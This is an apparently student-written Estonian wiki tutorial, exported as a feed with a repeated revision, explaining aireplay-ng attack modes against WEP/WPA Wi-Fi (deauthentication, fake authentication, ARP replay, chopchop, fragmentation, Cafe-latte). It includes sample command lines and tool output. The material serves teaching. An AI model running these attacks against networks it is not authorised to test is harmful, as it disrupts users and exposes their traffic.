See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
===ARP===&lt;br /&gt;
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
===IP===&lt;br /&gt;
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks &#039;&#039;bit flippingut&#039;&#039;. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC&#039;i muutmiseks juhul kui seal on algselt &#039;&#039;multicast&#039;&#039;.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
[[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32780</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32780"/>
		<updated>2011-05-24T18:32:09Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Broadcast */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Autor=&lt;br /&gt;
Tanel Liiv D22 (2011)&lt;br /&gt;
&lt;br /&gt;
=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
12:35:25  Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA  mon0&lt;br /&gt;
21:33:25  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel -1&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
21:33:25  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:28  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
